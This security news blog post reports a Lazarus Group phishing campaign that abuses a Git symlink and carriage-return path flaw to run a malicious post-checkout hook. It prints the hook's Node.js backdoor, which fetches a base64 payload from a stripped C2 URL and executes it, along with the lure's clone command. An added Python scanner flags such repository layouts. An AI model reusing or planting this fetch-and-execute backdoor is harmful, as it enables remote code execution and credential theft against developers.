Cyber Web Spider Blog – News


Lazarus Hackers Exploiting Git Symlink Vulnerability in Sophisticated Phishing Attack

Posted on September 10, 2025 / September 11, 2025 By CWS

Early this month, cybersecurity researchers uncovered a novel phishing campaign attributed to the Lazarus Group that targets developers and crypto professionals via a cleverly crafted Git symlink vulnerability.

Rather than relying solely on conventional malware distribution channels, the attackers have weaponized the way Git handles repository paths, embedding malicious hooks behind symbolic links to trigger code execution during routine operations.

This technique allows the attackers to keep a low profile while compromising high-value targets who assume that their development workflows are immune to social engineering.

The initial lure begins with personalized messages on professional networking platforms, where potential victims are invited to take part in a mock technical interview.

The conversation is structured to gain the victim's confidence and coax them into running a single Git clone command.

In addition, the repository contains a nested directory named api/db_drivers that is actually a symbolic link pointing back into the repository's .git module directory.

This deceptive structure ensures that once Git performs a checkout operation, it unwittingly executes the attacker's custom hook script.

KuCoin analysts noted the first instances of this attack vector in late August, following reports of compromised private GitLab repositories.

Detailed analysis revealed that the symlink exploit leverages Git's post-checkout hook mechanism to launch a hidden backdoor.

By embedding a malicious post-checkout script behind the symbolic link, the attackers achieve code execution without modifying the main codebase, thus evading standard integrity checks and static scanners.

Subsequent forensic examination confirmed that the payload establishes an encrypted connection to a remote command-and-control server, siphoning credentials, system information, and wallet data back to the threat actors.

Attack Flowchart (Non-Technical) (Source – KuCoin)

The exploit's sophistication lies in its seamless integration with legitimate workflows. Victims report that after executing:

git clone --recursive https://guest:[email protected]/product/source.git
cd product/source

the malicious hook is automatically triggered. The embedded script, hooks/post-checkout, invokes a Node.js backdoor (the command-and-control URL is stripped in the published sample):

const vm = require('vm');
const https = require('https');
// Fetch a JSON document from the C2 server (URL not preserved in the source article).
https.get('<C2 URL stripped in source>', res => {
  let data = "";
  res.on('data', chunk => data += chunk);
  // Decode the base64 "payload" field and execute it in a fresh VM context,
  // so the second-stage code never touches the repository on disk.
  res.on('end', () => vm.runInNewContext(Buffer.from(JSON.parse(data).payload, 'base64')));
});

Once deployed, this backdoor maintains persistence by cleaning and replacing project files to remove obvious signs of tampering, ensuring that developers see only the expected code.

Infection Mechanism Deep Dive

The infection unfolds in two coordinated phases: exploitation of Git's path resolution and stealthy hook execution.

First, the attackers create a repository with a directory entry named api/db_drivers^M, exploiting carriage-return handling to write the path as api/db_drivers on disk while retaining the symlink target internally.

Attack Flowchart (Technical) (Source – KuCoin)

This discrepancy confuses Git into treating the path as a regular directory during traversal but as a link when initializing hooks.

As Git performs the default checkout, it follows the hidden symlink into the .git/modules/api/db_drivers/hooks/ directory and executes the post-checkout script.
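The checks a defender would run over a freshly cloned tree, covering both the symlink-into-.git layout described earlier and the carriage-return path entry from the deep dive, as an added example that is not part of the original article or of KuCoin's analysis. It builds a constructed directory tree that mimics the described layout (a plain directory, not a real Git repository, and no network access) and scans it for three indicators: control characters in a path component, symlinks that resolve into a .git directory, and executable hooks under any hooks directory beneath .git, including submodule hooks under .git/modules/. The function names and the api/db_drivers layout are assumptions drawn from the article's description.

```python
"""Scan a checked-out tree for the indicators described in the article (added example)."""
import os
import stat
import tempfile
from pathlib import Path


def scan_repo(root):
    """Walk `root` without following symlinks and report three indicators:
    control characters in a path component, symlinks that resolve into a
    .git directory, and executable hooks under any .git/**/hooks directory."""
    root = Path(root).resolve()
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):  # followlinks=False by default
        for name in dirnames + filenames:
            full = Path(dirpath) / name
            rel = full.relative_to(root)
            # 1. A carriage return or other control character in a path component
            #    (the api/db_drivers^M entry in the article) is never legitimate.
            if any(ord(c) < 0x20 for c in name):
                shown = str(rel).encode("unicode_escape").decode("ascii")
                findings.append(("control-char-in-name", shown))
            # 2. A symlink whose target resolves into a .git directory lets a
            #    checkout write hooks or config that Git will later trust.
            if full.is_symlink():
                link = os.readlink(full)
                target = (full.parent / link).resolve()
                if ".git" in target.parts:
                    findings.append(("symlink-into-git-dir", f"{rel} -> {link}"))
            # 3. An executable, non-sample hook in a hooks/ directory under .git
            #    (including submodule hooks under .git/modules/) runs on checkout.
            elif (full.is_file() and full.parent.name == "hooks"
                  and ".git" in rel.parts and not name.endswith(".sample")
                  and full.stat().st_mode & stat.S_IXUSR):
                findings.append(("active-git-hook", str(rel)))
    return findings


def build_demo_tree(base):
    """Constructed sample tree mimicking the layout the article describes.
    It is a plain directory, not a real Git repository or clone."""
    base = Path(base)
    hooks = base / ".git" / "modules" / "api" / "db_drivers" / "hooks"
    hooks.mkdir(parents=True)
    hook = hooks / "post-checkout"
    hook.write_text("#!/bin/sh\necho 'hook ran'\n")
    hook.chmod(0o755)
    (hooks / "pre-commit.sample").write_text("# inert sample hook\n")
    (base / "api").mkdir()
    # Symlink in the worktree pointing back into the module's hook directory.
    os.symlink("../.git/modules/api/db_drivers", base / "api" / "db_drivers")
    # Sibling entry carrying the trailing carriage return from the deep dive.
    (base / "api" / "db_drivers\r").mkdir()
    (base / "README.md").write_text("benign project file\n")
    return base


def demo():
    """Build the constructed tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_repo(build_demo_tree(tmp))


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind:24} {detail}")
```

A scan like this belongs in whatever vets a repository before anyone checks it out; on the developer side, Git's own core.hooksPath setting points hook lookup at a directory you control instead of .git/hooks, and reviewing an untrusted repository before running git submodule update (which --recursive performs implicitly) limits what a clone can populate under .git/modules/.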

By exploiting a fundamental behavior of Git, the Lazarus Group has demonstrated a new level of technical ingenuity, blending supply chain compromise with social engineering to target high-value individuals.

The campaign serves as a stark reminder that even the most trusted development tools can be weaponized when assumptions about workflow integrity go unchallenged.


Category: Cyber Security News. Tags: Attack, Exploiting, Git, Hackers, Lazarus, Phishing, Sophisticated, Symlink, Vulnerability
